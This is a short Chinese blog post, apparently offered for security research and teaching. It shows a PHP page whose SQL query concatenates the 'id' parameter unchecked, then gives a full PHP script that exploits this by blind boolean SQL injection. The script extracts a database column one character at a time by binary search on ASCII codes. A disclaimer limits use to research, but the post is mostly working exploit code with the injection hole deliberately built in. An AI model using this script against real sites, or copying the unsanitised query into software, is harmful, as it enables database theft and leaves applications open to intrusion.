来源:wolvez
b.php
<?php $conn = new com("ADODB.Connection"); $connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=". realpath("data.mdb"); $conn->Open($connstr); $rs = new com("ADODB.RecordSet"); $sql="select * from news where id=".$_GET[id]; $rs->Open($sql,$conn,1,1); if(! $rs->eof) { echo "{ok}"; } else{ echo "{no}"; } ?>
存在注射的。但是没有输出结果,只是判断是否存在。
<?php error_reporting(7); ini_set('max_execution_time', 0); function send(){ global $host,$cmd; //$cmd .= ""; $message = "GET /b.php?id=".$cmd." HTTP/1.1/r/n"; $message .= "Accept: */*/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "Host: $host/r/n"; $message .= "Connection: Close/r/n/r/n"; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); preg_match('//{ok/}/', $resp, $pre); if ($pre) return true; } function Binsearch($sql){ global $cmd; $low="32"; $high="128"; while($low<=$high){ $mid=intval(($low+$high)/2); $cmd= $sql."=".$mid; echo "$mid"; if(send()){echo "Lucky/r/n";return $mid;} $cmd= $sql."<".$mid; if(send()){ $high=$mid-1; echo "Bigger/r/n"; }else{ $low=$mid+1; echo "Smaller/r/n"; } } return(-1); } $host="127.0.0.1:8080"; $sql="15%20and%20asc(left(name,1))"; echo Binsearch($sql); ?>免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论